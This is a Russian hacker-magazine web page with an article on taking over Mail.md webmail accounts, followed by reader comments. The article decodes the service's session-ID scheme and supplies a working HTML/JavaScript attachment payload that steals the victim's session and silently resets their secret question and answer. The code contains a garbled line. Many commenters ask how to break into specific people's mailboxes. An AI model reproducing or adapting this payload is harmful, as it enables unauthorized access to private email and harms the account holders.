Карта сайта Хакер в RSS Энциклопедия Хакера PDA версия сайта Почтовые рассылки Хакера    Хакер в Twitter Хакер в ВКонтакте Приложение Хакер для Facebook Хакер на Formspring.me
Журнал Новости Форум Видео Life Xakep Live (блоги)
Bugtrack Статьи Блог Поиск English
Трюки с phpinfo Трюки с phpinfo
Совсем недавно в паблике появилась информация о новом интересном подходе к эксплуатации уязвимостей класса LFI с помощью бесполезной на первый взгляд функции phpinfo() и временных загрузочных файлов. Берем на вооружение этот полезный прием....
Интервью с создателем NGINX Игорем Сысоевым Интервью с создателем NGINX Игорем Сысоевым
Легкий веб-сервер NGINX буквально только что вышел на 2 место по популярности в интернете. А незадолго до этого создатель NGINX привлек 3 млн. долларов инвестиций и основал одноименную компанию. В общем, поводов для общения с Игорем Сысоевым у нас была масса....

Читаем чужие письма на Mail.md

Bookmark and Share

Для познающего всякое право собственности
теряет силу: или же все есть грабеж и воровство. 
Ф. Ницше 

 

И в начале небольшое предупреждение... Все о чем я сейчас буду рассказывать, наверно преследуется по закону, и вообще аморально, поэтому данная инфа приводится исключительно в образовательных целях, особливо это будет полезно почитать админу вышеуказанного сервера (но ему об этом еще рано знать). 

Итак. Что можно сказать, бросив беглый взгляд на их усилия предоставить своим пользователям конфиденциальность??? Вроде все нормально, но! Для того чтобы сменить пароль на ящик надо знать старый пароль, а для смены секретного вопроса и соответственно ответа на него, нифига знать не надо! (Вот уроды (c) by Брат II). Значит его и будем менять. 

Весь почтовый сервер обслуживает всего одна цгеха, которая имеет звучное название login. Для идентификации пользователя используется такая фигня - никнаме:x:x:x:x:xxxxxxxx:x:x:x:x, где никнаме - имя пользователя, а x-какято цифра. То есть форма отправляет серверу примерно следующее: /cgi-bin/login?sessionid= никнаме:x:x:x:x:xxxxxxxx:x:x:x:x, ну и конечно же поля формы. Если внимательно присмотреться к этим цифрам, можно заметить, что то, что посередине генерируется случайно (и не меняется весь сеанс работы с ящиком), все остальные числа статические, и наверняка что-то для сервера значат. 

От нечего делать я из всех записал, и вот что у меня получилось. В Главном меню:

nickname:0:1:0:6:xxxxxxxx:3:3:1:1 - линк на инбох, 
nickname:0:1:0:6:xxxxxxxx:4:3:1:1 - линк на compose 
nickname:0:1:0:6:xxxxxxxx:11:3:1:1 - линк на addreses 
nickname:0:1:0:6:xxxxxxxx:12:3:1:1 - линк на folders 
nickname:0:1:0:6:xxxxxxxx:6:3:1:1 - линк на options 
nickname:0:1:0:6:xxxxxxxx:14:3:1:1 - линк на logout 
на смену пароля и секретного вопроса -  nickname:0:1:0:6:xxxxxxxx:16:26:1:1 

Я мог бы продолжить и перечислить все остальное, если надо сами глянете, скажу тока пару слов - первое число (сразу после имени) - это номер письма, которое Вы сейчас читаете, второе число - номер папки, в которой вы находитесь (1 по умолчанию - INBOX, 2 - SEND ITEMS, 3 - DELETET ITEMS, ну и т.д) следующая - гуй ее знает что это, но она всегда = 0, потом идет цифра, которая показывает как сортировать письма (1 - by Sender, 3 - by Subject, 7 - by Size и 5 - by Date). Дальше идет рандомное 8-значное число, 2 цифры за ним говорят серверу что мы хотим сделать, и 2 последние всегда = 1 Итак, все что нам надо сделать - узнать эти рандомно генерируемые числа.

Я думаю хватит теории, вот непосредственно атака: создаем у себя на диске файлец и назовем его например part2, в нем пишем следующую муть:

<img src="http://" onmouseover=" 
line1=parent.frames[0].document.links[0]; 
line2=line1.href; 
a3=line2.length; 
a3Ј-7; 
line3=line2.substring(43,a3); 
line3=line3+'16:26:1:1'; 
document.forma.sessionid.value=line3; 
document.forma.submit();"> 
<form name=forma action="/cgi-bin/login" method=post> 
<input type=hidden name="sessionid" value=""> 
<input type=hidden name="questionr" value="vopros"> 
<input type=hidden name="passremin" value="otvet"> 
</form> 

Дальше текст письма и все такое.... Пишем письмецо жертве, и прикрепляем к нему наш файлец part2... Как тока жертва откроет наш атачмент, секретный вопрос на его(ее) ящик поменяется... Всю эту фигню надо слать обязательно в атачменте, потому что по-иному фильтруются теги...





СЛЕДУЮЩИЕ СТАТЬИ
Бабло на малвари: как и сколько зарабатывают наши криминальные коллеги?
phpMyAdmin на лопатках: взлом известного движка с помощью нашумевшего бага в глобализации переменных
Критическая уязвимость в SSL вышла из разряда теоретических: исследователи выпустили программу для взлома шифрования
Cloud Hacking: облачные вычисления на службе у пентестера
Опасные обновления: заражение системы через механизм автоапдейтов
SCADA под прицелом: анализ защищенности АСУ ТП
Обратная связь DNS: продвинутый payload для организации туннеля
Сосед из ада: 18 лет тюрьмы за взлом Wi-Fi
Каждому хакеру – по VoIP: ищем и взламываем VoIP-шлюзы
Обратная связь DNS: обходим преграды и организовываем доступ в Сеть
ПРЕДЫДУЩИЕ СТАТЬИ
Беспроводные сети: взлом и защита №2
Беспроводные сети: взлом и защита №1
Памятка взломщика или как удержать права root
Reflection SYN флуд атаки
CSS на практике или как был взломан Сombats.ru
HTML: интерпретируем баги
Развитие мысли или грузим файлы бочками
Как была взломана nkb.spb.ru
Фильтруй базар №2
Фильтруй базар №2
ОБСУЖДЕНИЕ СТАТЬИ
Логин:
Пароль:
Если у вас есть форумный логин - вы можете использовать его, иначе анонимный гостевой доступ.

Для оставления комментария вы можете зарегистрироваться по упрощенной процедуре.

Обсуждение этой статьи на forum.xakep.ru
Для отправки сообщения введите код, указанный на картинке
Сообщение

UserГость
19.08.2007 15:25:37
Ответить Ссылка
Вообще-то "Нитше" пишется как "НИЦШЕ", блин!
UserГость
19.08.2007 15:25:37
Ответить Ссылка
MD = Must Die, поэтому mail.MD = mail.MustDie. Позорный домен.
UserГость
19.08.2007 15:25:37
Ответить Ссылка
а с чего вы взяли, что эпиграф принадлежит Ницше? Может, "Нитше" - это такой псевдоним у автора
UserГость
19.08.2007 15:25:37
Ответить Ссылка
Ничего не поняла, но очень бы хотела вскрыть ящик одного долбо..а. Не с целью сделать плохо, а с целью взять за нос и ткнуть. Рассказал бы подробнее что делать то?
UserГость
19.08.2007 15:25:37
Ответить Ссылка
2 OMEN13: Сам ты позорный, а знаешь как расшифровывается OMEN - Obscene Man which Enjoys Nobody.
UserГость
19.08.2007 15:25:37
Ответить Ссылка
Не че не понятно просто отстой
UserГость
19.08.2007 15:25:37
Ответить Ссылка
Ребята, знаю, что вы самые умные - помогите, у меня был всегда бесплатный почтовый ящик на hotmail@com.? но что-то прозошло и он у меня не открывается. Что делать, у меня там очень важная информация - заплачу, помогите и срочно. Спасибо.
UserГость
19.08.2007 15:25:37
Ответить Ссылка
Ребята , как взломать почту ,помогите !!!! А то у вас там не очень понятно написано ....!!!!
UserГость
19.08.2007 15:25:37
Ответить Ссылка
а в принципе так ведь можно взломать почти любой е-мэил если знать какие там номера (1 2 3)
UserГость
19.08.2007 15:25:37
Ответить Ссылка
Привет! Ничего не выходит,что то вы напутали,или я не совсем понял объясните пожалуйста подробней.Мне нужно хамов и матершинеков одних наказать. С уважением Сергей.
UserГость
19.08.2007 15:25:37
Ответить Ссылка
Probyval i tak i syak.... Ne vyhodit. Ne menyaetsya ni vopros ni otvet. Napeshite podrobnei shto i kak delat'. Mne po4emuto kajetsya shto oshibka v samom kode. Peresmotrite pojalusto...
UserГость
19.08.2007 15:25:37
Ответить Ссылка
da blin nifiga ne vixodit u menia, vsiu noc sidel, nu i na ... vse eti stucki, ja lucse muziku poslusaju
UserГость
19.08.2007 15:25:37
Ответить Ссылка
blin...po drugomu eto vse nazivaetsya "session hijacking"...Nihera u vas ne poluchit´sya.
UserГость
19.08.2007 15:25:37
Ответить Ссылка
ПАМАГИТЕ!!! ДРУЗЬЯ ЕСТЬ ОДИН ОЧЕНЬ НИХОРОШИЙ ЧЕЛОВЕК, КОТОРЫЙ КИДАЕТ СВОИХ ЖЕ НА БАБЛО! ПОМОГИТЕ ВЗЛОМАТЬ ЕГО ПОЧТУ НА YAHOO.COM ОЧЕНЬ ПРОШУ!!! ЗАРАНЕЕ ВСЕМ СПАСИБО
UserГость
19.08.2007 15:25:37
Ответить Ссылка
Народ, вы че? как не получается... как увидел ваши мессаги, так сразу ломанулся пробовать... все пашет... p.s. передирая в наглую скрипт, у вас нифига не выйдет. надо буквально децул подумать.
UserГость
19.08.2007 15:25:37
Ответить Ссылка
Ха-ха, в который раз очередной админ очередного webmailа наступает на давно известные грабли :) Регистрация на этом мэйл-мэ-дэ щас прикрыта - не из-за этой ли статьи, интересно? :) - так что сам проверить не могу, но: проверяется ли айпи (или куки), или достаточно ID сеанса?.. (думаю понятно, к чему я клоню:))
UserГость
19.08.2007 15:25:37
Ответить Ссылка
Класно но это было давно и давно забили ребята молодцы
UserГость
19.08.2007 15:25:37
Ответить Ссылка
2 Kombinator, localhost@molodva.cc: A ya vashe ne uvajaiu MoldovaCC... da hotyaby za ih neudobnyi access k FTP... vot blya... VSem osta?nym.... blin, nado kakt- sest? i podumat?.... prosto napre4sya i podumat?.... glavno kogda naprigatsya - ne obosratsya... "(думаю понятно, к чему я клоню:))".... 2 c0t: a ty by mog ostavit´ rabo4ii mail... 2 fixxxer: Ya koneshno ne Hacker i daje ne programist no mogu skazat´ tebe odno... shto Ty lamer... i vot po4emu: 1. Ха-ха, в который раз очередной админ очередного webmailа - takogo pafosa ya eshyo davno ne vidal... dai sylku na svoi raboty! my otsenim.. nah... 2.Регистрация прикрыта...не из-за статьи - net, registratsia uje kak god zakryta! ne znaesh´, ne vyiobyvaisya! 3. сам проверить не могу - blya, shtob proverit´ tebe prosto nujno vybrat´ haoti4nyi Login (i proverit´ ego sushestvovania 4erez "Forgot your password")... i kinut´ na nego svoit tak nazyvaemyi "part2" s tvoego maila.. tipa.... fixxxer_vsem_adminam_admin@hui.ru vot i vsyo..... Delom nado zanimatsya... S uvajeniem.... Ruhlea!
UserГость
19.08.2007 15:25:37
Ответить Ссылка
Ребята , как взломать почту ,помогите !!!! А то у вас там не очень понятно написано ....!!!!
UserГость
19.08.2007 15:25:37
Ответить Ссылка
Люди как можно зная только адрес (на yandex-е) скачать с ящика месаги? помогите ПЛз!
UserГость
19.08.2007 15:25:37
Ответить Ссылка
Научите пожалуста взламывать ящики.Зарание спасибо!
UserГость
19.08.2007 15:25:37
Ответить Ссылка
Пожалуста помогите научится взламывать ящики а то тут плохо понятно.
UserГость
19.08.2007 15:25:37
Ответить Ссылка
Люди, нужна помощь. Как подобрать пароль к чужой почте на www.freemail.ukr.net ? Ну просто позарез надо... =((
UserГость
19.08.2007 15:25:37
Ответить Ссылка
Господа! А можно ли взломать почту на платнике? Если можно то как? Просто очень надо!!!! Заранее спасибо! Огромное!
UserГость
19.08.2007 15:25:37
Ответить Ссылка
O.k . Я знаю что это довольно тупой вопрос , но с чего то всегда надо начинать . Вы тут показали как я понял HTML код , но он без начала и без конца . Вопервых в какой фаил это пихать ? HTML ? Если да то как его начать ? Ну , полный ХТМЛ код . А если нет то как его вставить в другой фаил ? Send Comments на мой временный имэил .
UserГость
19.08.2007 15:25:37
Ответить Ссылка
Мужики, скиньте на mail ,пожалуйста, какую литературу стоит почитать, чтобы этому научиться.
UserГость
19.08.2007 15:25:37
Ответить Ссылка
Люди, нужна помощь. Как подобрать пароль к чужой почте на www.mail.ru? Ну просто позарез надо... =((
UserГость
19.08.2007 15:25:37
Ответить Ссылка
помогите пожалуйста. Как взломать мыло на freemail.ukr.net очень-очень надо Плиз!!!!!!!! заранье спасибо!!!!
UserГость
19.08.2007 15:25:37
Ответить Ссылка
Но, всё-таки Социальная инженерия лучше, тем более, что на том же майле есть служба восстановления пароля, нужно знать-то: ответ на секретный вопрос и всё! или заполнить форму, к чему мучения? .всем пока
UserГость
19.08.2007 15:25:37
Ответить Ссылка
very bad
UserГость
05.03.2008 13:15:45
Ответить Ссылка
cine esti?
UserГость
22.12.2008 15:28:39
Ответить Ссылка
>>Рассказал бы подробнее что делать то?
>>А то у вас там не очень понятно написано ....!!!!
>>Не че не понятно просто отстой

В этом и есть отличие хакеров от юзеров, хе-хе...

>>в принципе так ведь можно взломать почти любой е-мэил

Респект!
UserГость
19.03.2010 8:40:28
Ответить Ссылка
Вы пароли и логины давайти лучше чем хуйней заниматься
UserГость
19.03.2010 8:42:18
Ответить Ссылка
ПАРОЛИ И ЛОГИНЫ ДАВАЙТЕ БЫСТРО
UserГость
17.04.2010 23:24:29
Ответить Ссылка
душанбэ




Keywords: zPOSTz zHACKz, zINFOz, zINTERNETz z16300z
Для Авторов: edit Lock delete Lock



    Rambler's Top100